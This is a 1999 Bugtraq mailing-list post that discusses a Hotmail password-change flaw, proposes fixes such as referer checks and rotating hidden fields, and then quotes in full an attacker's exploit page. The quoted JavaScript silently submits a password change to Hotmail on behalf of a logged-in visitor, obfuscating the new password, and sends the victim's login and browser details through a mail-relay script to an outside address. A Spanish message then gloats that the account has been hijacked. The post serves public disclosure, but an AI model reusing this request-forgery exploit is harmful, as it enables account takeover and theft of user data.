[10460] in bugtraq
hotmail claims vulnerability patched, so here it is
daemon@ATHENA.MIT.EDU (David L. Nicol)
Thu May 6 16:13:18 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Message-Id: <3730C6C6.2FA62E30@kasey.umkc.edu>
Date: Wed, 5 May 1999 17:31:34 -0500
Reply-To: "David L. Nicol" <david@KASEY.UMKC.EDU>
From: "David L. Nicol" <david@KASEY.UMKC.EDU>
X-To: paulf@cnet.com
To: BUGTRAQ@NETSPACE.ORG
Dear Paul:
I am reading your previous article on hotmail security,
http://www.news.com/News/Item/0,4,33996,00.html
and I'm CCing this message to the bugtraq list.
A good patch from Hotmail would have to involve some additional
info with the cookie.
A couple of approaches that come to mind include:
verifying http_referer data in the script submission to make sure its
from the expected hotmail page
putting additional hidden key fields with constantly changing names
and values on submittalbe pages, to provide verification that the pages
are legit
investigating any incidents of pages being submitted with incorrect,
nonexistent, or unexpected "secret flag fields" as described above
I don't work for hotmail (as you know) and I am caught up in this
as a bystander;
I would expect hotmail to give you a explanation of their patch that no=
t
only is detailed but makes sense and that you cannot find a hole in.
If hotmail merely changed the names of variables, or did a similar
short term fix, the next expolit might not be nice enough to announce
itself as such. Modifying the attached El Lite exploit to only work
if it had a particular hotmail account might be a piece of cake;
allowing
for some highly targeted kinds of attacks. (esp. if a hotmail user is
doing anything involving return-email verification, like tipjar or firs=
t
virtual.)
Here is the hacker's tripod page, including the exploit that
takes advantage of the trust hotmail has for instructions from
your browser, by secretly sending instructions to hotmail to change
your password to
<HTML>
<kraffa2=3D"<HEAD>
<!--Begin JavaScrypt roadmap code. If editing downloaded HTML source,
delete
this portion.-->
<scrypt language=3D"JavaScrypt">
<!--
function TripodShowPopup()
{
// open the popup window
var popupURL =3D
"http://members.tripod.com/adm/popup/roadmap.shtml";
var popup =3D
window.open(popupURL,"TripodPopup",'toolbar=3D0,location=3D0,directorie=
s=3D0,status=3D0,menubar=3D0,scrollbars=3D0,resizable=3D0,width=3D575,h=
eight=3D105');
// set the opener if it's not already set. it's set
automatically
// in netscape 3.0+ and ie 3.0+.
if( navigator.appName.substring(0,8) =3D=3D "Netscape" )
{
popup.location =3D popupURL;
}
}
TripodShowPopup();
// -->
</scrypt>
<!--End inserted JavaScript code.-->
<base href=3D"http://members.tripod.com/kraffa2/Hook.html">
</HEAD>
<body>
<scrypt>
<!--
function getCGIValue(nombre, elURL)
{
elURL=3D elURL;
nombre=3D nombre+"=3D";
vacio=3D"";
found=3D elURL.indexOf(nombre);
if (found > -1)
{
found2=3D elURL.indexOf("&",found);
found+=3D nombre.length;
end=3D (found2 > -1) ? found2 : elURL.length;
var value=3D elURL.substring(found, end);
value=3D (value !=3D null) ? value : vacio;
return value;
}
else {return vacio;}
}
Query=3D unescape(self.location.search);
disk=3D getCGIValue("disk", Query);
login=3D getCGIValue("login", Query);
host=3D "www.hotmail.com";
hintq=3D escape('<img
src=3D"http://www.badenpage.de/pirate/bilder/flagge.jpg"><br><center>by=
El
Lite=A9</center>');
hinta=3D '%66axf%61x';
TheURL=3D
"http://
"+host+"/cgi-bin/dopassword?"+"disk=3D"+disk+"&login=3D"+login+"&f=3D34=
145&curmbox=3DACTIVE&_lang=3D&np=3Dyes&new_%70%61%73s%77d=3D%6B%6B%6A%6=
A01&new_%70%61%73s%77d2=3Dkk%6A%6A01&hi%6E%74q=3D"+hintq+"&hinta=3D"+hi=
nta;
Mail=3D
"http://www.tipjar.com/cgi-bin/generic?mailto=3Dpaulinaporizkova@hotmai=
l.com&mailfrom=3D
"+login+"@hotmail.com&subject=3D"+login+"+HMpass+cambiada+%0A%0ASu+nave=
gador+es+"+escape(navigator.userAgent+"\n.\n");
options=3D
'toolbar=3D0,location=3D0,directories=3D0,status=3D0,menubar=3D0,scroll=
bars=3D0,resizable=3D0,width=3D575,height=3D105';
HOTMAIL=3D window.open(TheURL,"HOTMAIL",options);
self.focus();
setTimeout("HOTMAIL.close()",8000);
MAIL=3D window.open(Mail,"MAIL",options);
self.focus();
setTimeout("MAIL.close()",8000);
//-->
</scrypt>
<pre><b>
Uno de los mejores correos gratis que existen es precisamente el que
tu est=E1s usando, hotmail. Su seguridad e inviolabilidad son ya
legendarias.
Tanto es as=ED que mira por donde a partir de este mism=EDsimo moment=
o las
cosas van a tomar otro cariz. Quiero decir que lament=E1ndolo mucho t=
u
direcci=F3n de hotmail ha sido inutilizada, o mejor dicho, secuestrad=
a
por mi.
Ya nunca mas podr=E1s entrar en ella.
As=ED de definitivo. Ahora es
SOLO MIAAA!!!! :-))))
Como soy un buenazo y no eres mi =FAnica v=EDctima pues un dia de est=
os
voy a
publicar en es.comp.hackers la password que os puse (es la misma para
todos
vosotros pardillos)
Hala, que te sea leve
El Lite©
</b></pre>
</body>
</html>
